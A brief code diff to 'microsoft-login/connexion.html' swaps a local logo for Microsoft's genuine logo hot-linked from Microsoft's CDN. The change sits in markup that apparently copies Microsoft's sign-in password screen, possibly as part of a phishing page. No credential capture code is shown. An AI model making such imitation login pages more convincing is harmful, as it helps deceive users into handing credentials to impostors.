--- a/microsoft-login/connexion.html
+++ b/microsoft-login/connexion.html
@@ -18,7 +18,7 @@
 <body>
     <section id="section_pwd">
         <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
+            <img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft" class="d-block" />
             <div class="identity w-100 mt-16 mb-16">
                 <button class="back">
                     <img src="assets/back.png" />
